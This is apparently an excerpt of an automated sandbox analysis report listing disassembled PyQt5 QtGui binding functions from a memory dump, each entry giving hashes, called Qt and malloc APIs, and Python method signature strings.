                                                                                                                                                                                                                                          • Opcode ID: e06d3ea0e4e178cafea0f7ad3de114c61733ac92c02e20d297d019ac16b7daba
                                                                                                                                                                                                                                          • Instruction ID: a897967de3f7803e22a28e7ef1164708f7944986d8f9231898811c7eb3629a3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e06d3ea0e4e178cafea0f7ad3de114c61733ac92c02e20d297d019ac16b7daba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9611D476A18F46D1EB209B11E8896A933A5FB48BC4F914132DA9E03324EF39E559C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?frameGeometry@QWindow@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FF89D966148
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?frameGeometry@Rect@@Window@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$frameGeometry$frameGeometry(self) -> QRect
                                                                                                                                                                                                                                          • API String ID: 2394784811-2715355677
                                                                                                                                                                                                                                          • Opcode ID: 67390fa3928531d50e846b8c7bbf8db5b037ee6ced8fa7f0c95f33534833ec68
                                                                                                                                                                                                                                          • Instruction ID: e1fbaae0c9a032cec521b29f5bf84f5d1e688e7cfcfc762b1a72be99485ecb2b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67390fa3928531d50e846b8c7bbf8db5b037ee6ced8fa7f0c95f33534833ec68
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C110577A09A4681EB109F65E8896A933A4FB44FD0F918032DA9E07320EF7DF599C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?size@QStaticText@@QEBA?AVQSizeF@@XZ.QT5GUI ref: 00007FF89D99E118
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?size@SizeStaticText@@malloc
                                                                                                                                                                                                                                          • String ID: QStaticText$size$size(self) -> QSizeF
                                                                                                                                                                                                                                          • API String ID: 4108446641-3401004608
                                                                                                                                                                                                                                          • Opcode ID: 76467196cafda7bc2e80d266c26c5692d51bd2237cc11284da58accd816c089c
                                                                                                                                                                                                                                          • Instruction ID: a03ad60188fff573e4315c9f432494632b3b23b75555b770cd296d3200872e9d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76467196cafda7bc2e80d266c26c5692d51bd2237cc11284da58accd816c089c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0110977A09A4685EB10DF61E84A6A933A5FB44FD0F918032C98E07320EF7DE559D744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?previous@QTextBlock@@QEBA?AV1@XZ.QT5GUI ref: 00007FF89D99E068
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?previous@Block@@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextBlock$previous$previous(self) -> QTextBlock
                                                                                                                                                                                                                                          • API String ID: 2126126676-4171310763
                                                                                                                                                                                                                                          • Opcode ID: 1f5047df8e7db3ac91c1337c0b3e796959bb8cc9928506f5b36508a3024e45c4
                                                                                                                                                                                                                                          • Instruction ID: 0cac6b741bba89eee56c63a9d49a8fbc388d52ed527df9759898ef8bcf44505d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f5047df8e7db3ac91c1337c0b3e796959bb8cc9928506f5b36508a3024e45c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78110977A09A4695EB109F61E8496A933A5FB44FD4F918032C98E07320EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?rectPoints@QPageSize@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FF89D9C00B8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?rectPagePoints@Rect@@Size@@malloc
                                                                                                                                                                                                                                          • String ID: QPageSize$rectPoints$rectPoints(self) -> QRect
                                                                                                                                                                                                                                          • API String ID: 778997778-2166890302
                                                                                                                                                                                                                                          • Opcode ID: 82be4533acec4891f07a846e5503e8a2f096e0abdbc94527be644c5030deb480
                                                                                                                                                                                                                                          • Instruction ID: 5df727c74d356614e954eb54e34e11bda0419f98f03c10a21ce53dcd8ef5ff6d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82be4533acec4891f07a846e5503e8a2f096e0abdbc94527be644c5030deb480
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45112337A08A4A85EB10DF21E8496A933A4FB44FD0F918032CA9E07320EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toolTip@QTextCharFormat@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D9920A8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?toolCharFormat@@String@@TextTip@malloc
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$toolTip$toolTip(self) -> str
                                                                                                                                                                                                                                          • API String ID: 2373747465-1020150115
                                                                                                                                                                                                                                          • Opcode ID: 09147ff8525dca628f3aabfe1351473e2b3c2af9bd377b84426219ce61898191
                                                                                                                                                                                                                                          • Instruction ID: 9e0fe7c518952f34a7ef205fea1a226bc87d79d3dcb73bd85aba5e7a131dc258
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09147ff8525dca628f3aabfe1351473e2b3c2af9bd377b84426219ce61898191
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A811F777A08A4681EB10DB65E84A6A923A5FB44FD0F918032C99E07320EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?textAlignment@QStandardItem@@QEBA?AV?$QFlags@W4AlignmentFlag@Qt@@@@XZ.QT5GUI ref: 00007FF89D9A80A8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?textAlignmentAlignment@Flag@Flags@Item@@Qt@@@@Standardmalloc
                                                                                                                                                                                                                                          • String ID: QStandardItem$textAlignment$textAlignment(self) -> Qt.Alignment
                                                                                                                                                                                                                                          • API String ID: 333683570-2463140100
                                                                                                                                                                                                                                          • Opcode ID: 4ece0d1aafe4df7e469a038808dc6a8d8a0e6b9f37815f15312fe9a654044874
                                                                                                                                                                                                                                          • Instruction ID: 02ee66edc42a3c4613e152c0bea4b3934bc682607fabda5cbdb40735eb721ba5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ece0d1aafe4df7e469a038808dc6a8d8a0e6b9f37815f15312fe9a654044874
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51110977A08A4686EB109F65E84A6A933A4FB44FD0F918032CA8E07320EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?serialNumber@QScreen@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D96E0A8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?serialNumber@Screen@@String@@malloc
                                                                                                                                                                                                                                          • String ID: QScreen$serialNumber$serialNumber(self) -> str
                                                                                                                                                                                                                                          • API String ID: 685519441-386738514
                                                                                                                                                                                                                                          • Opcode ID: d90530b9e19b7316ac076db9ff9334b6ac98a3b2911d04554cfea8242d9ceb78
                                                                                                                                                                                                                                          • Instruction ID: ec97759f31bd363a7df94029a86990acef4a6ad6e8853b4265dac421dd97e62b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d90530b9e19b7316ac076db9ff9334b6ac98a3b2911d04554cfea8242d9ceb78
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15112737A08A4681EB109F25E8496A933A5FB44FD0F918032D99E07320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?availableGeometry@QScreen@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FF89D967FF8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?availableGeometry@Rect@@Screen@@malloc
                                                                                                                                                                                                                                          • String ID: QScreen$availableGeometry$availableGeometry(self) -> QRect
                                                                                                                                                                                                                                          • API String ID: 1745336275-3514874228
                                                                                                                                                                                                                                          • Opcode ID: 49469ab52b471dffe08a82612dc637538c161a3c14d5e1b28dde4d8e8f280c07
                                                                                                                                                                                                                                          • Instruction ID: 1058c5957602034f78ffdd891b874eb24cad018b45c01456ae947d7a4b46db6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49469ab52b471dffe08a82612dc637538c161a3c14d5e1b28dde4d8e8f280c07
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB113C37A08A4681EB10DF51E8496A933A4FB44FD0F918032D98E07320EF7DF559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?clipBoundingRect@QPainter@@QEBA?AVQRectF@@XZ.QT5GUI ref: 00007FF89D9BA028
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?clipBoundingPainter@@RectRect@malloc
                                                                                                                                                                                                                                          • String ID: QPainter$clipBoundingRect$clipBoundingRect(self) -> QRectF
                                                                                                                                                                                                                                          • API String ID: 4051243836-18387798
                                                                                                                                                                                                                                          • Opcode ID: 66dbe4922fdeaaf945f2ba1eb4cc0cadbbbc93bfb9e23534778a9899d9f002b9
                                                                                                                                                                                                                                          • Instruction ID: fc34e9cb3af927e56b7a9244f2723bc01e565cfbf290064e69bbbe17f5b1c7fc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66dbe4922fdeaaf945f2ba1eb4cc0cadbbbc93bfb9e23534778a9899d9f002b9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43110977A08B4681EB109F65E8496A933A4FB44FD0F918032D99E07320EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?rect@QTextInlineObject@@QEBA?AVQRectF@@XZ.QT5GUI ref: 00007FF89D95A028
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?rect@InlineObject@@RectTextmalloc
                                                                                                                                                                                                                                          • String ID: QTextInlineObject$rect$rect(self) -> QRectF
                                                                                                                                                                                                                                          • API String ID: 953544639-1617625793
                                                                                                                                                                                                                                          • Opcode ID: a92a5fc0f0efbfbbe6f3fd7a734d401c06c60eccc059be02fbd3875958d7ec74
                                                                                                                                                                                                                                          • Instruction ID: 6cfb4059a5143b8a0cc17d4531b2595a708b8447648fc4ffce1327df6b229a9d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a92a5fc0f0efbfbbe6f3fd7a734d401c06c60eccc059be02fbd3875958d7ec74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C011F337A08A4681EB109F61E84A6A923A4FB48FD4F918032DA9E47320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?textOption@QStaticText@@QEBA?AVQTextOption@@XZ.QT5GUI ref: 00007FF89D99DF88
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?textOption@Option@@StaticTextText@@malloc
                                                                                                                                                                                                                                          • String ID: QStaticText$textOption$textOption(self) -> QTextOption
                                                                                                                                                                                                                                          • API String ID: 4070111431-2825344591
                                                                                                                                                                                                                                          • Opcode ID: 4e245d7aef438e946ede31001756702ca612b7c3095a3b6f9e0deb5182f79b7e
                                                                                                                                                                                                                                          • Instruction ID: a8cde272e500f628315ac57bc0d488161e11dc2b4a269c95286c08fe49271399
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e245d7aef438e946ede31001756702ca612b7c3095a3b6f9e0deb5182f79b7e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2113937A08A4685EB10DF21E88A6A933A5FB44FD0F918032D99E07320EF7CE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?fullRectPoints@QPageLayout@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FF89D937F88
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?fullLayout@@PagePoints@RectRect@@malloc
                                                                                                                                                                                                                                          • String ID: QPageLayout$fullRectPoints$fullRectPoints(self) -> QRect
                                                                                                                                                                                                                                          • API String ID: 46280711-4079763324
                                                                                                                                                                                                                                          • Opcode ID: 5987976b00c010a2e7a58e060796b2e2229fadf4ca4330a42f22f91e89f1cf42
                                                                                                                                                                                                                                          • Instruction ID: 7ccef1a2fb1233824a4f0d46c22aa4fc0d201eeb5c673dd9910dd7344cdfc501
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5987976b00c010a2e7a58e060796b2e2229fadf4ca4330a42f22f91e89f1cf42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98113577A09A46C2EB10DF21E84A6A933A4FB44FD0F914032DA8E07320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: QTextInlineObject$isValid$isValid(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 2610644205-3622700107
                                                                                                                                                                                                                                          • Opcode ID: 9a12584f9f8b4398e24214ba72943bd925feda353f405b873b9434ee2e2499d8
                                                                                                                                                                                                                                          • Instruction ID: 6508dba61fc3cd291e3dfeb69b5ee01ad195fb500d6a6637000d4c5beae671f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a12584f9f8b4398e24214ba72943bd925feda353f405b873b9434ee2e2499d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90017537A04B46C2EB108F55E4894A873E8FF44B90B958036CE9E43330EF78E5A8C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setAlphaBufferFormat@@Size@Surface
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$setAlphaBufferSize$setAlphaBufferSize(self, size: int)
                                                                                                                                                                                                                                          • API String ID: 3682934702-1963592284
                                                                                                                                                                                                                                          • Opcode ID: 4c21275f77da6cb3fbcc058cb3f3b7a9d0fde10fea4944c05a0257792545f041
                                                                                                                                                                                                                                          • Instruction ID: daff643a1a3512eedafecf3324643a6886dcd466e2e9fd5ffb1e892fc77740dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c21275f77da6cb3fbcc058cb3f3b7a9d0fde10fea4944c05a0257792545f041
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4110636A18E46C1EB108F10E8896A933A4FB44B84F914032DA8E03320EF3DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setLimit@MiterPen@@
                                                                                                                                                                                                                                          • String ID: QPen$setMiterLimit$setMiterLimit(self, limit: float)
                                                                                                                                                                                                                                          • API String ID: 1691174720-3064348093
                                                                                                                                                                                                                                          • Opcode ID: c05fca766996a1100785e0fcb63486ee3d140d717b4f404b4a3f757f6e06317c
                                                                                                                                                                                                                                          • Instruction ID: 8615bdb7a57a05268b9ba5969d0cdb5760b2f7da8c90b15c037ba35a4833d44d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c05fca766996a1100785e0fcb63486ee3d140d717b4f404b4a3f757f6e06317c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91112A36A08F46D1EB10DF21E8896A933A4FB44F94F914132DA9E03320EF3DE55AC704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?removeColumn@Item@@Standard
                                                                                                                                                                                                                                          • String ID: QStandardItem$removeColumn$removeColumn(self, column: int)
                                                                                                                                                                                                                                          • API String ID: 2771442086-3921793217
                                                                                                                                                                                                                                          • Opcode ID: adcc2b2aeecedbd0562ea63310394f5fce69d6fffcbfbe064dbb5b35cf5d1cd9
                                                                                                                                                                                                                                          • Instruction ID: fb5db56556399bc4177e137da993cb2ccedd0ef3e317313c3e304942c0836cf1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adcc2b2aeecedbd0562ea63310394f5fce69d6fffcbfbe064dbb5b35cf5d1cd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C711E876A18E46D2EB10DF11E8896A933A5FB44FC4F914132DA9E03320EF3DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setHeight@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$setHeight$setHeight(self, arg: int)
                                                                                                                                                                                                                                          • API String ID: 3153827525-3907896206
                                                                                                                                                                                                                                          • Opcode ID: a3770f6fcbe74cdc623f9bdc490b62619909e5557bc26d8e7837d9ef482d14de
                                                                                                                                                                                                                                          • Instruction ID: bdf59be6430e3053eef9503b5533ca6541b8f313806525f2379934934cfb340e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3770f6fcbe74cdc623f9bdc490b62619909e5557bc26d8e7837d9ef482d14de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97112A36A08F46D1EB10CF10E8896A933A4FB44F84F914132DA9E03320EF7DE55AC708
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDoubleTop@Validator@@
                                                                                                                                                                                                                                          • String ID: QDoubleValidator$setTop$setTop(self, a0: float)
                                                                                                                                                                                                                                          • API String ID: 236495550-2298479482
                                                                                                                                                                                                                                          • Opcode ID: 39433fc4f0b28a58bfdb8d75a05f331745c07c2b40848e53f705764f3f56c8ef
                                                                                                                                                                                                                                          • Instruction ID: 8a2d9ec93f449d8c9aa54c759b08fd55657387d32b44fbca63a076fa095879f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39433fc4f0b28a58bfdb8d75a05f331745c07c2b40848e53f705764f3f56c8ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5111836A08E46D1EB10DF25E8896A933A4FB54F94F914032DA9E03320EF3DE55AC704
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBufferFormat@@Size@StencilSurface
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$setStencilBufferSize$setStencilBufferSize(self, size: int)
                                                                                                                                                                                                                                          • API String ID: 1793431822-2721710501
                                                                                                                                                                                                                                          • Opcode ID: 08f3612216dfc66986bca9366b597da75ac3b44f25a1ce1d0f8f345a2d119e79
                                                                                                                                                                                                                                          • Instruction ID: 30f7ce822e9488aa9166648e34cca2b07696098ac3b0cb2ce8b359c165d69253
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08f3612216dfc66986bca9366b597da75ac3b44f25a1ce1d0f8f345a2d119e79
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7211E876A18E46D1EB10DF11E8896A933A4FB44F84F914132DA8E43320EF3DE96AC744
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setFormat@@Interval@SurfaceSwap
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$setSwapInterval$setSwapInterval(self, interval: int)
                                                                                                                                                                                                                                          • API String ID: 2382669227-2638137130
